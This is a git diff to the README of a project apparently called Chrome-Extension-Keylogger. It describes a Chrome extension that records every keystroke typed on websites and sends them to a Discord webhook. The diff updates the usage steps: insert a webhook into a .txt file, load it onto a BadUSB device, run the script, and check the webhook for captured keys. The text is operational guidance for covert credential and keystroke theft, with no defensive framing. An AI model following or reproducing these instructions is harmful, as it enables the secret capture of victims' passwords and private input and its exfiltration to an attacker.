diff --git a/Chrome-Extension-Keylogger/README.md b/Chrome-Extension-Keylogger/README.md index 3fc19fc..cd43fb9 100644 --- a/Chrome-Extension-Keylogger/README.md +++ b/Chrome-Extension-Keylogger/README.md @@ -5,9 +5,9 @@ Creates the neccessary files for a chrome extension that logs all keystrokes on Then sends the collected keys to a discord webhook. USAGE -1. Replace $dc with your webhook. (if $dc is not defined in badUSB script or other.) -2. run the script. +1. Replace YOUR_WEBHOOK_HERE with your webhook. (in the .txt file.) +2. add the txt to your badUSB device and run the script. 3. test by going to a website in chrome browser (eg. google.com) and type some keys -4. Wait 30 seconds and check webhook for results. +4. Wait 20 seconds and check webhook for results. CREDITS - Kudos and credit to jakov for the js code!